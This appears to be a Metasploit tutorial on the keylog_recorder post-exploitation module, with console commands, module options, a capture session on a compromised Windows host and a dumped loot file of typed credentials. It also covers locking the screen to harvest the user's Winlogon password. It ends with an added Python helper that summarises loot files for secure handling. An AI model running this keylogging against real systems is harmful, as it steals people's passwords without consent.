keylog_recorder

The keylog_recorder post module captures keystrokes on the compromised system. Before capturing keystrokes, make sure you have migrated to an interactive process.

meterpreter >
Background session 1? [y/N] y
msf > use post/windows/capture/keylog_recorder
msf post(keylog_recorder) > info

       Name: Windows Capture Keystroke Recorder
     Module: post/windows/capture/keylog_recorder
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Carlos Perez 
  Josh Hale 

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  CAPTURE_TYPE  explorer         no        Capture keystrokes for Explorer, Winlogon or PID (Accepted: explorer, winlogon, pid)
  INTERVAL      5                no        Time interval to save keystrokes in seconds
  LOCKSCREEN    false            no        Lock system screen.
  MIGRATE       false            no        Perform Migration.
  PID                            no        Process ID to migrate to
  SESSION                        yes       The session to run this module on.

Description:
  This module can be used to capture keystrokes. To capture keystrokes
  when the session is running as SYSTEM, the MIGRATE option must be
  enabled and the CAPTURE_TYPE option should be set to one of
  Explorer, Winlogon, or a specific PID. To capture the keystrokes of
  the interactive user, the Explorer option should be used with
  MIGRATE enabled. Keep in mind that this will demote this session to
  the user's privileges, so it makes sense to create a separate
  session for this task. The Winlogon option will capture the username
  and password entered into the logon and unlock dialog. The
  LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to
  for the user to enter their clear-text password. It is recommended
  to run this module as a job, otherwise it will tie up your framework
  user interface.

msf post(keylog_recorder) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...
meterpreter >

After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.

root@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root  s3cr3t
ftp ftp.micro
soft.com  anonymous  anon@ano
n.com  e  quit  
root@kali:~#
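
Loot files like the one above hold clear-text credentials, so they should be inventoried for secure handling once testing ends. The following is an added example, not part of the original page or of Metasploit: it parses the loot filename and header line shown above into handling metadata without echoing the captured text. The field layout is an assumption inferred from the single sample on this page, and `describe_loot` is a hypothetical helper name.

```python
import re
from datetime import datetime

# Assumed layout, inferred from the one sample filename on this page:
# <YYYYmmddHHMMSS>_<workspace>_<IPv4 host>_<loot type>_<id>.<ext>
LOOT_NAME = re.compile(
    r"^(?P<saved>\d{14})_(?P<workspace>.+)_(?P<host>\d{1,3}(?:\.\d{1,3}){3})"
    r"_(?P<loot_type>.+)_(?P<ident>\d+)\.(?P<ext>\w+)$"
)
HEADER = "Keystroke log started at "

# Filename and header line are from the page; the two body lines are constructed.
SAMPLE_NAME = "20110421120355_default_192.168.1.195_host.windows.key_328113.txt"
SAMPLE_TEXT = (
    "Keystroke log started at Thu Apr 21 12:03:55 -0600 2011\n"
    "alpha  beta\n"
    "gamma\n"
)


def describe_loot(filename, text):
    """Return handling metadata for one keystroke loot file, never its contents."""
    m = LOOT_NAME.match(filename)
    if m is None:
        raise ValueError(f"not a recognised loot filename: {filename!r}")
    lines = text.splitlines()
    started = None
    if lines and lines[0].startswith(HEADER):
        stamp = lines[0][len(HEADER):].strip()
        started = datetime.strptime(stamp, "%a %b %d %H:%M:%S %z %Y")
        lines = lines[1:]
    # Count non-whitespace characters only; the captured text is not echoed.
    chars = sum(len("".join(line.split())) for line in lines)
    return {
        "saved": datetime.strptime(m["saved"], "%Y%m%d%H%M%S"),
        "workspace": m["workspace"],
        "host": m["host"],
        "loot_type": m["loot_type"],
        "started": started,
        "keystroke_chars": chars,
        "needs_secure_handling": chars > 0,
    }


if __name__ == "__main__":
    for key, value in describe_loot(SAMPLE_NAME, SAMPLE_TEXT).items():
        print(f"{key}: {value}")
```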